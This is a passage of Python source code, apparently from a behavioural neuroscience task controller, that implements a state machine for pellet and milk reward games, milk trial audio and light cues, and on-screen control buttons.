                              ' runs slower than assigned ' + \
                              'rate ' + str(game_rate) + ' Hz. Duration ' + \
                              str(elapsed) + ' ms.', RuntimeWarning)
        # Only produce a transition if the loop was not interrupted via exit()
        if self._continue:
            next_state, next_kwargs = outcome
            return next_state, next_kwargs
    def exit(self):
        """
        Interrupts repeated GameState.repeat_logic calls and
        causes GameState.enter method to return None.
        """
        self._continue = False
class GameState_Init_Rewards(GameState):
    """
    This state dispenses rewards if any are required during initialization,
    splitting InitPellets across active pellet feeders and delivering
    InitMilk at every active milk feeder, then transitions to the interval state.
    """
    def __init__(self, **kwargs):
        # Parse input arguments
        self._GameState_kwargs = kwargs
        self.MessageToOE = kwargs['MessageToOE']
        self.init_pellets = kwargs['InitPellets']
        self.init_milk = kwargs['InitMilk']
        # Reward device managers are optional; fall back to no active feeders
        if 'PelletRewardDevices' in kwargs.keys() and hasattr(kwargs['PelletRewardDevices'], 'IDs_active'):
            self.pellet_IDs_active = kwargs['PelletRewardDevices'].IDs_active
        else:
            self.pellet_IDs_active = []
        if 'MilkRewardDevices' in kwargs.keys() and hasattr(kwargs['MilkRewardDevices'], 'IDs_active'):
            self.milk_IDs_active = kwargs['MilkRewardDevices'].IDs_active
        else:
            self.milk_IDs_active = []
    def _release_pellet_reward(self, ID, quantity):
        """Run a one-off GameState_PelletReward to dispense quantity pellets at feeder ID."""
        # Removed a dead local (a kwargs dict that was built but never used)
        game_state = GameState_PelletReward(**self._GameState_kwargs)
        game_state.enter(1, action='GameState_Init_Rewards', ID=ID,
                         quantity=quantity, suppress_MessageToOE=True)
    def _release_milk_reward(self, ID, quantity):
        """Run a one-off GameState_MilkReward to dispense quantity of milk at feeder ID."""
        # Removed a dead local (a kwargs dict that was built but never used)
        game_state = GameState_MilkReward(**self._GameState_kwargs)
        game_state.enter(1, action='GameState_Init_Rewards', ID=ID,
                         quantity=quantity, suppress_MessageToOE=True)
    def _compute_pellet_rewards(self):
        """Split self.init_pellets as evenly as possible across active pellet feeders."""
        minPellets = int(np.floor(float(self.init_pellets) / len(self.pellet_IDs_active)))
        extraPellets = np.mod(self.init_pellets, len(self.pellet_IDs_active))
        feeder_pellet_count = minPellets * np.ones(len(self.pellet_IDs_active), dtype=np.int16)
        # Distribute the remainder one pellet at a time to the first feeders
        feeder_pellet_count[:extraPellets] = feeder_pellet_count[:extraPellets] + 1
        return feeder_pellet_count
    def _dispense_pellet_rewards(self, feeder_pellet_count):
        """Start one thread per feeder releasing its share of pellets; return the threads."""
        T_rewards = []
        for ID, n_pellets in zip(self.pellet_IDs_active, feeder_pellet_count):
            if n_pellets > 0:
                T = Thread(target=self._release_pellet_reward, args=(ID, n_pellets))
                T.start()
                T_rewards.append(T)
        return T_rewards
    def _dispense_milk_rewards(self, quantity):
        """Start one thread per active milk feeder releasing quantity; return the threads."""
        T_rewards = []
        for ID in self.milk_IDs_active:
            T = Thread(target=self._release_milk_reward, args=(ID, quantity))
            T.start()
            T_rewards.append(T)
        return T_rewards
    def pre_logic(self, **kwargs):
        self.MessageToOE('GameState_Init_Rewards')
        # Collect threads into this list
        T_rewards = []
        # Dispense pellet rewards
        if len(self.pellet_IDs_active) > 0 and self.init_pellets > 0:
            feeder_pellet_count = self._compute_pellet_rewards()
            T_rewards += self._dispense_pellet_rewards(feeder_pellet_count)
        # Dispense milk rewards
        if len(self.milk_IDs_active) > 0 and self.init_milk > 0:
            T_rewards += self._dispense_milk_rewards(self.init_milk)
        # Ensure all threads have finished
        for T in T_rewards:
            T.join()
    def repeat_logic(self, **kwargs):
        # Initialization rewards are done; proceed straight to the interval state
        return 'GameState_Interval', {}
class GameState_Interval_Pellet(GameState):
    """Idle state of the pellet-only game: waits for conditions that trigger the next state."""

    def __init__(self, **kwargs):
        # Parse input arguments
        self.MessageToOE = kwargs['MessageToOE']
        self.PelletGame_Variables = kwargs['PelletGame_Variables']
        self.pellet_feeder_ID = kwargs['PelletChoice'].next()

    def pre_logic(self, **kwargs):
        self.MessageToOE('GameState_Interval_Pellet')

    def repeat_logic(self, **kwargs):
        # Query the pellet game variables relevant to this state
        inactive_too_long = self.PelletGame_Variables.get('inactivity', 'complete', set_relevant=True)
        is_chewing = self.PelletGame_Variables.get('chewing', 'complete', set_relevant=True)
        interval_passed = self.PelletGame_Variables.get('time_since_last_pellet', 'complete', set_relevant=True)
        if inactive_too_long:
            # Too long without any reward: release a pellet immediately
            return 'GameState_PelletReward', {'action': 'goal_inactivity', 'ID': self.pellet_feeder_ID}
        if is_chewing and interval_passed:
            # Chewing detected and enough time since the previous pellet reward
            return 'GameState_Pellet', {}
class GameState_Interval_Milk(GameState):
    """Idle state of the milk-only game: waits until a new milk trial may begin."""

    def __init__(self, **kwargs):
        # Parse input arguments
        self.MessageToOE = kwargs['MessageToOE']
        self.MilkGame_Variables = kwargs['MilkGame_Variables']

    def pre_logic(self, **kwargs):
        self.MessageToOE('GameState_Interval_Milk')

    def repeat_logic(self, **kwargs):
        # Has enough time elapsed since the previous milk trial?
        if self.MilkGame_Variables.get('time_since_last_milk_trial', 'complete', set_relevant=True):
            return 'GameState_Milk', {}
class GameState_Interval_Pellet_And_Milk(GameState):
    """Idle state of the combined game: chooses between the pellet and milk sub-games."""

    def __init__(self, **kwargs):
        # Parse input arguments
        self.MessageToOE = kwargs['MessageToOE']
        self.PelletGame_Variables = kwargs['PelletGame_Variables']
        self.MilkGame_Variables = kwargs['MilkGame_Variables']
        self.pellet_milk_ratio = kwargs['PelletMilkRatio']
        self.pellet_feeder_ID = kwargs['PelletChoice'].next()

    def pre_logic(self, **kwargs):
        self.MessageToOE('GameState_Interval_Pellet_And_Milk')

    def _choose_subtask(self):
        # Draw from uniform(0, 1): below the ratio -> pellet game, otherwise milk game
        return 'GameState_Pellet' if random.uniform(0, 1) < self.pellet_milk_ratio else 'GameState_Milk'

    def repeat_logic(self, **kwargs):
        # Query the variables relevant to this state
        inactive_too_long = self.PelletGame_Variables.get('inactivity', 'complete', set_relevant=True)
        is_chewing = self.PelletGame_Variables.get('chewing', 'complete', set_relevant=True)
        pellet_ready = self.PelletGame_Variables.get('time_since_last_pellet', 'complete', set_relevant=True)
        milk_ready = self.MilkGame_Variables.get('time_since_last_milk_trial', 'complete', set_relevant=True)
        if inactive_too_long:
            # Too long without any reward: release a pellet immediately
            return 'GameState_PelletReward', {'action': 'goal_inactivity', 'ID': self.pellet_feeder_ID}
        if is_chewing and pellet_ready and milk_ready:
            # Both sub-games are ready: pick one probabilistically
            return self._choose_subtask(), {}
        if is_chewing and pellet_ready:
            # Only the pellet game is ready (milk interval has not passed)
            return 'GameState_Pellet', {}
        if (not is_chewing) and pellet_ready and milk_ready:
            # Only the milk game is ready (no chewing detected)
            return 'GameState_Milk', {}
def GameState_Interval(**kwargs):
    """Factory returning the interval state matching the active game(s).

    Expects kwargs['games_active'] to be a dict with boolean 'pellet' and
    'milk' entries; all kwargs are forwarded to the chosen state class.

    Raises:
        ValueError: if neither game is active. (Previously this case fell
        through and silently returned None, which crashed later in the
        game loop with a less informative error.)
    """
    games_active = kwargs['games_active']
    if games_active['pellet'] and not games_active['milk']:
        return GameState_Interval_Pellet(**kwargs)
    elif games_active['milk'] and not games_active['pellet']:
        return GameState_Interval_Milk(**kwargs)
    elif games_active['pellet'] and games_active['milk']:
        return GameState_Interval_Pellet_And_Milk(**kwargs)
    else:
        raise ValueError('At least one of the pellet and milk games must be active.')
class GameState_Pellet(GameState):
    """Active pellet-game state: releases a pellet on mobility or prolonged inactivity."""

    def __init__(self, **kwargs):
        # Parse input arguments
        self.MessageToOE = kwargs['MessageToOE']
        self.GenericGame_Variables = kwargs['GenericGame_Variables']
        self.PelletGame_Variables = kwargs['PelletGame_Variables']
        self.game_counters = kwargs['game_counters']
        self.feeder_ID = kwargs['PelletChoice'].next()

    def update_game_counters(self, ID):
        # Increment the displayed pellet count for this feeder
        position = self.game_counters['Pellets']['ID'].index(ID)
        self.game_counters['Pellets']['count'][position] += 1

    def pre_logic(self, **kwargs):
        self.MessageToOE('GameState_Pellet')

    def repeat_logic(self, **kwargs):
        # Query the variables relevant to this state
        inactive_too_long = self.PelletGame_Variables.get('inactivity', 'complete', set_relevant=True)
        mobile_enough = self.GenericGame_Variables.get('mobility', 'complete', set_relevant=True)
        if inactive_too_long:
            # Too long without any reward: release a pellet
            self.update_game_counters(self.feeder_ID)
            return 'GameState_PelletReward', {'action': 'GameState_Pellet.inactivity', 'ID': self.feeder_ID}
        if mobile_enough:
            # Sufficient movement detected: release a pellet
            self.update_game_counters(self.feeder_ID)
            return 'GameState_PelletReward', {'action': 'GameState_Pellet.mobility', 'ID': self.feeder_ID}
class GameState_PelletReward(GameState):
    """State that releases a pellet reward.

    The release happens in pre_logic to avoid warnings about too slow
    processing in GameState.repeat_logic method.
    """

    def __init__(self, **kwargs):
        # Parse input arguments
        self.MessageToOE = kwargs['MessageToOE']
        self.quantity = kwargs['PelletQuantity']
        self.reward_device = kwargs['PelletRewardDevices']
        self.PelletGame_Variables = kwargs['PelletGame_Variables']

    def pre_logic(self, **kwargs):
        # Announce the state change unless explicitly suppressed by the caller
        if not kwargs.get('suppress_MessageToOE', False):
            self.MessageToOE('GameState_PelletReward ' + kwargs['action'])
        # Parse input arguments; an explicit quantity overrides the configured one
        feeder_id = kwargs['ID']
        self.quantity = kwargs.get('quantity', self.quantity)
        # Send command to release reward and wait for positive feedback
        success = self.reward_device.actuator_method_call(feeder_id, 'release', self.quantity)
        if success:
            # Send message to Open Ephys GUI
            self.MessageToOE('Reward pellet ' + feeder_id + ' ' + str(self.quantity))
            # Reset last reward timer
            self.PelletGame_Variables.update_last_reward()
        else:
            # If failed, remove feeder from game and change button(s) red
            self.reward_device.inactivate_feeder(feeder_id)
            # Send message to Open Ephys GUI
            self.MessageToOE('FEEDER pellet ' + feeder_id + ' inactivated')

    def repeat_logic(self, **kwargs):
        return ('GameState_Interval', {})
class GameState_Milk(GameState):
    """Active milk-game state: starts a milk trial once the subject is ready.

    Falls back to the interval state if the trial start conditions are not
    met within MAX_STATE_DURATION seconds.
    """

    # Maximum time (seconds) to wait for trial start conditions before giving
    # up and returning to the interval state (was an inline magic number 60).
    MAX_STATE_DURATION = 60

    def __init__(self, **kwargs):
        # Parse input arguments
        self.MessageToOE = kwargs['MessageToOE']
        self.GenericGame_Variables = kwargs['GenericGame_Variables']
        self.MilkGame_Variables = kwargs['MilkGame_Variables']

    def pre_logic(self, **kwargs):
        self.MessageToOE('GameState_Milk')

    def _check_duration(self):
        """Return seconds elapsed since this method was first called in this state."""
        if not hasattr(self, '_time_of_first_check_duration'):
            self._time_of_first_check_duration = time()
        return time() - self._time_of_first_check_duration

    def repeat_logic(self, **kwargs):
        # Acquire relevant variable states
        conditions = {'mobility': self.GenericGame_Variables.get('mobility', 'complete', set_relevant=True),
                      'distance_from_milk_feeders': self.MilkGame_Variables.get('distance_from_milk_feeders', 'complete', set_relevant=True),
                      'angular_distance_from_goal_feeder': self.MilkGame_Variables.get('angular_distance_from_goal_feeder', 'complete', set_relevant=True)}
        if conditions['distance_from_milk_feeders'] and conditions['mobility'] and conditions['angular_distance_from_goal_feeder']:
            # If animal is far enough from milk feeders and is mobile enough but not running to the goal, start milk trial
            return 'GameState_MilkTrial', {'action': 'GameState_Milk'}
        elif self._check_duration() > self.MAX_STATE_DURATION:
            # Give up on starting a trial and return to the interval state
            return 'GameState_Interval', {}
class GameState_MilkTrial(GameState):
    """State covering an ongoing milk trial.

    A trial succeeds when the subject reaches the goal feeder, fails on
    timeout, and (for repeat trials only) fails immediately if the subject
    visits an incorrect feeder. The previously duplicated success path of
    logic_first_trial/logic_other_trial is factored into _goal_reached.
    """

    def __init__(self, **kwargs):
        # Parse input arguments
        self.MessageToOE = kwargs['MessageToOE']
        self.MilkGoal = kwargs['MilkGoal']
        self.MilkTrialSignals = kwargs['MilkTrialSignals']
        self.GenericGame_Variables = kwargs['GenericGame_Variables']
        self.MilkGame_Variables = kwargs['MilkGame_Variables']
        self.game_counters = kwargs['game_counters']

    def update_game_counters_started(self, ID):
        # Count this trial as started for feeder ID
        idx = self.game_counters['Milk trials']['ID'].index(ID)
        self.game_counters['Milk trials']['count'][idx] += 1

    def update_game_counters_successful(self, ID):
        # Count this trial as successful for feeder ID
        idx = self.game_counters['Successful']['ID'].index(ID)
        self.game_counters['Successful']['count'][idx] += 1

    def pre_logic(self, **kwargs):
        # Check if this is the first repetition
        first_repetition = self.MilkGoal.check_if_first_repetition()
        # Send timestamp to Open Ephys GUI
        OEmessage = 'GameState_MilkTrial ' + kwargs['action'] + ' ' + self.MilkGoal.copy_ID()
        if first_repetition:
            OEmessage += ' presentation_trial'
        else:
            OEmessage += ' repeat_trial'
        self.MessageToOE(OEmessage)
        # Reset milk trial timers
        self.MilkGame_Variables.update_min_trial_separation()
        self.MilkGame_Variables.update_last_trial()
        # Start milk trial signals in the background so the game loop is not blocked
        Thread(target=self.MilkTrialSignals.start,
               args=(self.MilkGoal.copy_ID(), first_repetition)).start()
        # Update game counters
        self.update_game_counters_started(self.MilkGoal.copy_ID())

    def _goal_reached(self, trial_type):
        """Shared success path: update counters, stop signals, advance the goal.

        Returns the state transition tuple for a successful trial.
        """
        self.update_game_counters_successful(self.MilkGoal.copy_ID())
        self.MilkTrialSignals.stop(self.MilkGoal.copy_ID())
        ID = self.MilkGoal.copy_ID()
        self.MilkGoal.next(game_counters=self.game_counters)
        return 'GameState_MilkReward', {'action': 'GameState_MilkTrial', 'ID': ID, 'trial_type': trial_type}

    def logic_first_trial(self, **kwargs):
        # Acquire relevant variable states
        conditions = {'distance_from_goal_feeder': self.MilkGame_Variables.get('distance_from_goal_feeder', 'complete', set_relevant=True),
                      'milk_trial_duration': self.MilkGame_Variables.get('milk_trial_duration', 'complete', set_relevant=True)}
        if conditions['distance_from_goal_feeder']:
            # If subject reached goal location, proceed with reward
            return self._goal_reached('presentation')
        elif conditions['milk_trial_duration']:
            # If time limit for task duration has passed, stop milk trial without reward.
            # Milk Trial goal is not updated if first trial fails.
            self.MilkTrialSignals.stop(self.MilkGoal.copy_ID())
            return 'GameState_MilkTrial_Fail', {'reason': 'timeout'}

    def logic_other_trial(self, **kwargs):
        # Acquire relevant variable states
        conditions = {'distance_from_goal_feeder': self.MilkGame_Variables.get('distance_from_goal_feeder', 'complete', set_relevant=True),
                      'distance_from_other_feeders': self.MilkGame_Variables.get('distance_from_other_feeders', 'complete', set_relevant=True),
                      'milk_trial_duration': self.MilkGame_Variables.get('milk_trial_duration', 'complete', set_relevant=True)}
        if conditions['distance_from_goal_feeder']:
            # If subject reached goal location, proceed with reward
            return self._goal_reached('repeat')
        elif conditions['milk_trial_duration']:
            # If time limit for task duration has passed, stop milk trial without reward
            self.MilkTrialSignals.stop(self.MilkGoal.copy_ID())
            self.MilkGoal.next(game_counters=self.game_counters)
            return 'GameState_MilkTrial_Fail', {'reason': 'timeout'}
        elif not (conditions['distance_from_other_feeders'] is None) and conditions['distance_from_other_feeders']:
            # If subject went to incorrect location, stop milk trial with negative feedback
            self.MilkTrialSignals.stop(self.MilkGoal.copy_ID())
            self.MilkTrialSignals.fail(self.MilkGame_Variables.closest_feeder_ID())
            self.MilkGoal.next(game_counters=self.game_counters)
            return 'GameState_MilkTrial_Fail', {'reason': 'incorrect_feeder'}

    def repeat_logic(self, **kwargs):
        # Dispatch on whether the current goal is on its first (presentation) repetition
        if self.MilkGoal.check_if_first_repetition():
            return self.logic_first_trial(**kwargs)
        else:
            return self.logic_other_trial(**kwargs)
class GameState_MilkTrial_Fail(GameState):
    """State entered after a failed milk trial.

    The game halts for the duration of the milk trial penalty. The sleep is
    done in pre_logic to avoid warnings regarding slow processing in
    GameState.repeat_logic method.
    """

    def __init__(self, **kwargs):
        # Parse input arguments
        self.MessageToOE = kwargs['MessageToOE']
        self.penalty_duration = kwargs['MilkTrialFailPenalty']

    def pre_logic(self, **kwargs):
        self.MessageToOE('GameState_MilkTrial_Fail ' + kwargs['reason'])
        # Halt the game for the penalty period
        sleep(self.penalty_duration)

    def repeat_logic(self, **kwargs):
        return ('GameState_Interval', {})
class GameState_MilkReward(GameState):
    """State that releases a milk reward.

    The release happens in pre_logic to avoid warnings about too slow
    processing in GameState.repeat_logic method.
    """

    def __init__(self, **kwargs):
        # Parse input arguments
        self.MessageToOE = kwargs['MessageToOE']
        self.MilkTrialSignals = kwargs['MilkTrialSignals']
        self.quantity = kwargs['MilkQuantity']
        self.reward_device = kwargs['MilkRewardDevices']

    def _resolve_quantity(self, kwargs):
        """Pick the reward quantity: explicit > trial-type specific > largest configured (min 0)."""
        if 'quantity' in kwargs:
            return kwargs['quantity']
        if 'trial_type' in kwargs:
            return self.quantity[kwargs['trial_type']]
        # No hints available: fall back to the largest configured quantity, floored at 0
        return max([0] + list(self.quantity.values()))

    def pre_logic(self, **kwargs):
        # Announce the state change unless explicitly suppressed by the caller
        if not kwargs.get('suppress_MessageToOE', False):
            self.MessageToOE('GameState_MilkReward ' + kwargs['action'])
        # Parse input arguments
        feeder_id = kwargs['ID']
        quantity = self._resolve_quantity(kwargs)
        # Send command to release reward and wait for positive feedback
        success = self.reward_device.actuator_method_call(feeder_id, 'release', quantity)
        if success:
            # Send message to Open Ephys GUI
            self.MessageToOE('Reward milk ' + feeder_id + ' ' + str(quantity))
        else:
            # If failed, remove feeder from game and change button(s) red
            self.reward_device.inactivate_feeder(feeder_id)
            # Send message to Open Ephys GUI
            self.MessageToOE('FEEDER milk ' + feeder_id + ' inactivated')

    def repeat_logic(self, **kwargs):
        return ('GameState_Interval', {})
class GameStateOperator(object):
    """Drives the game state machine in a background thread.

    Starting from GameState_Init_Rewards, each state's enter() returns either
    None (stop) or a (next_state_name, kwargs) tuple; the next state class is
    looked up by name in module globals and constructed with the shared
    keyword arguments collected in __init__. The _active flag is read by the
    worker thread and written by close() from the caller's thread.
    """
    def __init__(self, TaskSettings, MessageToOE, Variables, game_counters, game_state_display_update,
                 PelletRewardDevices=None, PelletChoice=None, MilkRewardDevices=None,
                 MilkTrialSignals=None, MilkGoal=None):
        """
        TaskSettings - dict - see below which values are required
        MessageToOE - method - this method is called with string to log messages
        Variables - dict - instance of same name classes
        game_counters - dict -
        game_state_display_update - method is called with string specifying current game state
        The following input arguments are necessary depending
        if pellet or milk game is active, based on TaskSettings['games_active'].
        These input arguments should be instances of the same name classes:
        PelletRewardDevices
        PelletChoice
        MilkRewardDevices
        MilkTrialSignals
        MilkGoal
        """
        # Specify game update rate
        self.game_rate = 5 # Game update rate in Hz
        # Parse game state display input
        self._game_state_display_update = game_state_display_update
        # Start parsing input
        kwargs = {}
        # Parse TaskSettings
        kwargs['games_active'] = TaskSettings['games_active']
        kwargs['PelletMilkRatio'] = TaskSettings['PelletMilkRatio']
        kwargs['PelletQuantity'] = TaskSettings['PelletQuantity']
        kwargs['MilkTrialFailPenalty'] = TaskSettings['MilkTrialFailPenalty']
        kwargs['MilkQuantity'] = TaskSettings['MilkQuantity']
        kwargs['InitPellets'] = TaskSettings['InitPellets']
        kwargs['InitMilk'] = TaskSettings['InitMilk']
        # Parse generic inputs
        kwargs['game_counters'] = game_counters
        kwargs['MessageToOE'] = MessageToOE
        kwargs['GenericGame_Variables'] = Variables.set_dict()['GenericGame_Variables']
        # Parse pellet game inputs (only needed when the pellet game is active)
        if kwargs['games_active']['pellet']:
            kwargs['PelletGame_Variables'] = Variables.set_dict()['PelletGame_Variables']
            kwargs['PelletRewardDevices'] = PelletRewardDevices
            kwargs['PelletChoice'] = PelletChoice
        # Parse milk game inputs (only needed when the milk game is active)
        if kwargs['games_active']['milk']:
            kwargs['MilkGame_Variables'] = Variables.set_dict()['MilkGame_Variables']
            kwargs['MilkRewardDevices'] = MilkRewardDevices
            kwargs['MilkTrialSignals'] = MilkTrialSignals
            kwargs['MilkGoal'] = MilkGoal
        # Store for later use: every GameState class is constructed from this same dict
        self._GameState_kwargs = kwargs
    def _display_update(self, game_state):
        # Strip the 'GameState_' prefix before updating the display
        if game_state.startswith('GameState_'):
            game_state_name = game_state[10:]
        else:
            game_state_name = game_state
        self._game_state_display_update(game_state_name)
    def _process(self):
        # Main state machine loop; runs in the thread started by start().
        self._active = True
        self._display_update('GameState_Init_Rewards')
        self._GameState = GameState_Init_Rewards(**self._GameState_kwargs)
        ret = self._GameState.enter(self.game_rate, **{})
        while self._active:
            if ret is None:
                # A state returned no successor: stop the state machine
                self._active = False
            else:
                next_state, next_state_kwargs = ret
                self._display_update(next_state)
                # Resolve the next state class by name in module globals
                next_state_class = globals()[next_state]
                self._GameState = next_state_class(**self._GameState_kwargs)
                ret = self._GameState.enter(self.game_rate, **next_state_kwargs)
    def start(self):
        # Run the state machine loop in a background thread
        self._T__process = Thread(target=self._process)
        self._T__process.start()
    def close(self):
        # Signal the loop to stop, exit the current state and wait for the thread
        self._active = False
        self._GameState.exit()
        self._T__process.join()
class MilkTrial_AudioSignal(object):
    """Controls milk trial audio cues, either ambient (played locally) or feeder-localised."""

    def __init__(self, actuator_method_call, MessageToOE, AudioSignalMode, FEEDERsettings):
        """
        actuator_method_call - MilkRewardDevices.actuator_method_call method
        MessageToOE - method is called when signal is started with a message string
        AudioSignalMode - str - 'ambient' or 'localised'
        FEEDERsettings - dict - key (ID) and value (feeder specific parameters)
        """
        # Parse input
        self.actuator_method_call = actuator_method_call
        self.MessageToOE = MessageToOE
        self.AudioSignalMode = AudioSignalMode
        # Ambient mode needs sounds pre-built from feeder signal parameters
        if self.AudioSignalMode == 'ambient':
            self._init_ambient_sounds(FEEDERsettings)

    def _init_ambient_sounds(self, FEEDERsettings):
        # Build one sound object per feeder from its signal parameters
        self.ambient_sounds = {}
        for feeder_id in FEEDERsettings.keys():
            feeder_params = FEEDERsettings[feeder_id]
            self.ambient_sounds[feeder_id] = createAudioSignal(feeder_params['SignalHz'],
                                                               feeder_params['SignalHzWidth'],
                                                               feeder_params['ModulHz'])

    def start(self, ID):
        self.MessageToOE('AudioSignal Start')
        if self.AudioSignalMode == 'ambient':
            # Loop indefinitely until stop() is called
            self.ambient_sounds[ID].play(-1)
        else:
            self.actuator_method_call(ID, 'startTrialAudioSignal')

    def stop(self, ID):
        self.MessageToOE('AudioSignal Stop')
        if self.AudioSignalMode == 'ambient':
            self.ambient_sounds[ID].stop()
        else:
            self.actuator_method_call(ID, 'stopTrialAudioSignal')

    def play_negative(self, ID):
        # Negative feedback tone is always played via the feeder actuator
        self.MessageToOE('NegativeAudioSignal Play')
        self.actuator_method_call(ID, 'playNegativeAudioSignal')
class MilkTrial_LightSignal(object):
    """Controls the milk trial light cue on a feeder, with optional delayed start.

    Thread-safety note: start_delayed runs _delayed_starter in a separate
    thread; calling stop() while the delay is pending sets _cancel_delay so
    the pending start is abandoned instead of turning the light on after the
    trial ended. The flag handling is order-sensitive across threads.
    """
    def __init__(self, actuator_method_call, MessageToOE):
        """
        actuator_method_call - MilkRewardDevices.actuator_method_call method
        MessageToOE - method is called when signal is started with a message string
        """
        # Parse input
        self.actuator_method_call = actuator_method_call
        self.MessageToOE = MessageToOE
        # Prepare internal variables
        self.light_on = False  # True while the light signal is active
        self._waiting_on_delay = False  # True while _delayed_starter is sleeping
        self._cancel_delay = False  # set by stop() to abort a pending delayed start
    def start(self, ID):
        # Turn on the light signal at feeder ID and log to Open Ephys
        OEmessage = 'LightSignal Start'
        self.MessageToOE(OEmessage)
        self.actuator_method_call(ID, 'startLightSignal')
        self.light_on = True
    def stop(self, ID):
        # If a delayed start is still pending, cancel it instead of stopping
        if self._waiting_on_delay:
            self._cancel_delay = True
        else:
            OEmessage = 'LightSignal Stop'
            self.MessageToOE(OEmessage)
            self.actuator_method_call(ID, 'stopLightSignal')
            self.light_on = False
    def _delayed_starter(self, ID, delay):
        """
        delay - float - time to wait in seconds
        """
        self._waiting_on_delay = True
        sleep(delay)
        self._waiting_on_delay = False
        # Only start if stop() was not called during the delay
        if not self._cancel_delay:
            self.start(ID)
        self._cancel_delay = False
    def start_delayed(self, ID, delay):
        # Start the light signal after `delay` seconds without blocking the caller
        Thread(target=self._delayed_starter, args=(ID, delay)).start()
class MilkTrialSignals(object):
    """Coordinates audio and (optionally delayed, probabilistic) light cues for milk trials."""

    def __init__(self, TaskSettings, actuator_method_call, MessageToOE, FEEDERsettings=None):
        """
        TaskSettings - dict - General Task settings. See below for what is used.
        actuator_method_call - MilkRewardDevices.actuator_method_call method
        MessageToOE - method is called when signal is started with a message string
        FEEDERsettings - dict - key (ID) and value (feeder specific parameters)
        """
        # Parse TaskSettings
        self.FirstTrialLightOn = TaskSettings['LightSignalOnRepetitions']['presentation']
        self.OtherTrialLightOn = TaskSettings['LightSignalOnRepetitions']['repeat']
        self.lightSignalDelay = TaskSettings['lightSignalDelay']
        self.lightSignalProbability = TaskSettings['lightSignalProbability']
        # Initialize the audio signal handler
        self.MilkTrial_AudioSignal = MilkTrial_AudioSignal(actuator_method_call, MessageToOE,
                                                           TaskSettings['AudioSignalMode'], FEEDERsettings)
        # Only create a light signal handler if some repetition type uses it
        if self.FirstTrialLightOn or self.OtherTrialLightOn:
            self.MilkTrial_LightSignal = MilkTrial_LightSignal(actuator_method_call, MessageToOE)

    def light_signal_probabilistic_determinant(self):
        # Probabilities above 0.99 are treated as certain; otherwise draw at random
        return (self.lightSignalProbability > 0.99
                or random.random() < self.lightSignalProbability)

    def start(self, ID, first_repetition=False):
        """Start the audio cue and, when configured for this repetition type, the light cue."""
        self.MilkTrial_AudioSignal.start(ID)
        # The light signal is shown only if enabled for this repetition type,
        # and then only with probability lightSignalProbability.
        light_enabled = self.FirstTrialLightOn if first_repetition else self.OtherTrialLightOn
        if light_enabled and self.light_signal_probabilistic_determinant():
            if self.lightSignalDelay > 0:
                self.MilkTrial_LightSignal.start_delayed(ID, self.lightSignalDelay)
            else:
                self.MilkTrial_LightSignal.start(ID)

    def stop(self, ID):
        self.MilkTrial_AudioSignal.stop(ID)
        # Stop the light only if a light handler exists and the light is currently on
        if hasattr(self, 'MilkTrial_LightSignal') and self.MilkTrial_LightSignal.light_on:
            self.MilkTrial_LightSignal.stop(ID)

    def fail(self, ID):
        # Negative feedback tone at the feeder the subject incorrectly approached
        self.MilkTrial_AudioSignal.play_negative(ID)
class Buttons(object):
    """Builds, renders and dispatches the on-screen control buttons.

    self.list holds either plain button dicts or button groups: a list whose
    first element is a display-only header dict followed by one sub-button
    dict per feeder. Callbacks run in their own thread (see click()).
    """

    def __init__(self, position_on_screen, renderText,
                 PelletRewardDevices=None, MilkRewardDevices=None):
        """
        position_on_screen - dict - ['top', 'bottom', 'left', 'right'] border of the buttons
                                    on screen provided to Buttons.render method
        renderText - pygame.font.SysFont.render method for an existing font instace
        PelletRewardDevices - instance of class with same name.
                              If not provided, relevant buttons will not be created.
        MilkRewardDevices - instance of class with same name.
                            If not provided, relevant buttons will not be created.
        """
        self._PelletRewardDevices = PelletRewardDevices
        self._MilkRewardDevices = MilkRewardDevices
        self._define()
        self.list = Buttons._pre_render(self.list, position_on_screen, renderText)

    def buttonGameOnOff_callback(self, button):
        # Game on/off toggling is handled elsewhere; the button itself has no action here.
        pass

    def buttonReleaseReward_callback(self, button):
        # Debounce: keep the button disabled for half a second so a double
        # click cannot trigger two releases. (Removed dead `if False:` branch.)
        button['enabled'] = False
        sleep(0.5)
        button['enabled'] = True

    def buttonManualPellet_callback(self, button):
        # Flash the button in its pressed (toggled) state for half a second.
        button['button_pressed'] = True
        sleep(0.5)
        button['button_pressed'] = False

    def buttonMilkTrial_callback(self, button):
        # Debounce: keep the button disabled for half a second so a double
        # click cannot trigger two trials. (Removed dead `if False:` branch.)
        button['enabled'] = False
        sleep(0.5)
        button['enabled'] = True

    def get(self, name, FEEDER_ID=None):
        """Return the button dict registered under `name`, or the matching
        feeder sub-button when `name` refers to a button group."""
        button = self.list[self.names.index(name)]
        if isinstance(button, list):
            if FEEDER_ID is None:
                raise ValueError('get needs FEEDER_ID for this button_name.')
            else:
                # NOTE(review): if FEEDER_ID matches no sub-button, the whole
                # group list is returned unchanged — presumably callers always
                # pass a valid ID; verify against call sites.
                for subbutton in button:
                    if 'text' in subbutton.keys() and subbutton['text'] == FEEDER_ID:
                        button = subbutton
                        break
        return button

    def _inactivate_device(self, device_type, ID):
        """
        This method is called whenever a device is inactivated
        """
        if device_type == 'pellet':
            # Inactivate pellet reward button
            self.get('buttonReleasePellet', ID)['enabled'] = False
        elif device_type == 'milk':
            # Inactivate milk reward button
            self.get('buttonReleaseMilk', ID)['enabled'] = False
            # Inactivate milk trial button
            self.get('buttonMilkTrial', ID)['enabled'] = False
        else:
            raise ValueError('Unknown device_type.')

    def _define(self):
        """
        Add or remove buttons in this function
        Create new callbacks for new button if necessary
        Callbacks are called at button click in a new thread with button dictionary as argument
        Note default settings applied in Buttons._addDefaultProperties method
        """
        self.list = []
        self.names = []
        # Game On/Off button
        buttonGameOnOff = {'callback': self.buttonGameOnOff_callback,
                           'text': 'Game Off',
                           'toggled': {'text': 'Game On',
                                       'color': (0, 128, 0)}}
        self.list.append(buttonGameOnOff)
        self.names.append('buttonGameOnOff')
        # Button to mark manually released pellet
        buttonManualPellet = {'callback': self.buttonManualPellet_callback,
                              'text': 'Manual Pellet',
                              'toggled': {'text': 'Manual Pellet',
                                          'color': (0, 128, 0)}}
        self.list.append(buttonManualPellet)
        self.names.append('buttonManualPellet')
        # Button to release pellet
        if not (self._PelletRewardDevices is None):
            buttonReleasePellet = []
            buttonReleasePellet.append({'text': 'Release Pellet'})
            for ID in self._PelletRewardDevices.IDs_active:
                nFeederButton = {'callback': self.buttonReleaseReward_callback,
                                 'callargs': ['pellet', ID],
                                 'text': ID,
                                 'enabled': True,
                                 'toggled': {'text': ID,
